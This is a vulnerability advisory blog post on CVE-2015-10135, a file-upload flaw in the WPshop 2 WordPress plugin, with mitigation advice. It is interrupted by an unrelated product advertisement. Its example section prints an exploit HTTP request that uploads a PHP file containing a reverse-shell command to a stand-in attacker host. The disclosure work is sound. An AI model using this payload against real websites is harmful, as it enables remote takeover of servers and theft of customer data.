Overview
This blog post will detail an important vulnerability that affects the WPshop 2 E-Commerce plugin for WordPress. The vulnerability, known as CVE-2015-10135, allows for arbitrary file uploads due to missing file type validation in certain versions of the plugin. This flaw can potentially lead to system compromise or data leakage, making it a serious threat to any website that uses the affected plugin. Given the widespread use of WordPress for e-commerce and the popularity of the WPshop plugin, this vulnerability poses a substantial risk to online businesses and their customers.
Vulnerability Summary
CVE ID: CVE-2015-10135
Severity: Critical (9.8/10 on the CVSS scale)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Unauthenticated attackers can upload arbitrary files to the server potentially leading to system compromise or data leakage.
Affected Products
Share secrets securely
Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.
Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.
- • Encrypted identity
- • Private Spaces for organizations and teams
- • End-to-end encrypted chat, calls, files, and notes
- • Sensitive AI work and protected collaboration
- • Built for information that cannot leak
Our mission is to secure human work alongside AI.
Product | Affected Versions
WPshop 2 E-Commerce for WordPress | All versions prior to 1.3.9.6
How the Exploit Works
The vulnerability exists in the ajaxUpload function of the WPshop plugin. This function is used to handle file uploads, but it lacks proper file type validation checks. As a result, an unauthenticated attacker can send a specially crafted HTTP request to upload any file type to the server. This includes executable files or scripts that can be run on the server, leading to remote code execution.
Conceptual Example Code
Here is a conceptual example of how the vulnerability might be exploited. This is a sample HTTP POST request that uploads a malicious PHP file.
POST /wp-content/plugins/wpshop/includes/ajax.php HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="malicious.php"
Content-Type: application/x-php
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/attacker.com/4444 0>&1'"); ?>
------WebKitFormBoundary--In this example, the PHP file contains a command that opens a reverse shell to the attacker’s server, effectively granting them remote access to the server.
Mitigation Advice
The vendor has addressed this vulnerability in version 1.3.9.6 of the WPshop plugin. All users are strongly advised to update to this version or later. If immediate patching is not possible, users may consider using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to detect and block attempts to exploit this vulnerability. However, these are temporary mitigations and updating the plugin should be prioritized to fully resolve the vulnerability.